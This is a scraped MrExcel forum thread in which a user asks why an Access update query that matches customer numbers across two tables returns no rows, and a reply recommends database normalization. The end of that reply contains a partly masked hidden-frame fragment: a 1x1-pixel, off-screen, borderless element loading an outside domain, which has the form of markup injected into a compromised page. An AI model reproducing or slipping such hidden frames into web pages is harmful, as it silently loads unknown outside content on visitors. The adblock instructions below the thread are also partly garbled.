Update record if table A matches table B

sbalfourbrown

Hi,

I have a database which holds 2 tables (Pulled from seperate sourses). The first holds details of customers signed up to monthly bills (MB) and the other custmers who are registered on our website (OAM).

Both tables have a uniqueue customer number field and I am looking to identify which customers in my monthly bill table also hold an online account.

The method I'm trying to use is by creating an online registered column in the monthly bill table then run an update query to update this to "yes" if the Unique customer number is held in the oam table. This is what my query looks like

Update Query
Field: OAM Present
Table: MB
Update to: Yes
Criteria: [MB].[UCRN]=[OAM].[UCRN]

It looks right to me but when I run it I'm getting 0 results which is not possible as to be on MB customers should be on OAM.

Any help greatly appreciated

Excel Facts

Why are there 1,048,576 rows in Excel?
The Excel team increased the size of the grid in 2007. There are 2^20 rows and 2^14 columns for a total of 17 billion cells.
Based on what I've gleaned from your post, your issue is more probably more fundamental that it appears to you. Having two tables with customers in both is the root of your problem. This means your db hasn't acheived even first normal form. At the very least, your single customer table with all customers should have a field for OAM and one for MB. However, this would leave some holes (fields with no data in the row) where a customer is one but not the other. That's not unusual since, for example, customer tables regulary contain address information which includes an apartment or unit number. As we know, not everyone lives in an apartment. If there was a relationship between OAM and MB, your database would require another table to maintain a reasonable level of normalization. I sugges you search "database normalization" and find a source that explains it in a way that makes sense to you.******** src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;">*********>

Upvote 0

Forum statistics

Threads
Members
Latest member
Brainsanquine

We've detected that you are using an adblocker.

We have a great community of people providing Excel help here, but the hosting costs are enormous. You can help keep this site running by allowing ads on MrExcel.com.
Allow Ads at MrExcel

Which adblocker are you using?

Disable AdBlock

Follow these easy steps to disable AdBlock

1)Click on the icon in the browser’s toolbar.
2)Click on the icon in the browser’s toolbar.
2)Click on the "Pause on this site" option.
Go back

Disable AdBlock Plus

Follow these easy steps to disable AdBlock Plus

2)Click on the toggle to disable it for "mrexcel.com".
Go back

Disable uBlock Origin

Follow these easy steps to disable uBlock Origin

2)Click on the "Power" button.
3)Click on the "Refresh" button.
Go back

Disable uBlock

Follow these easy steps to disable uBlock

2)Click on the "Power" button.
3)Click on the "Refresh" button.
Go back
Back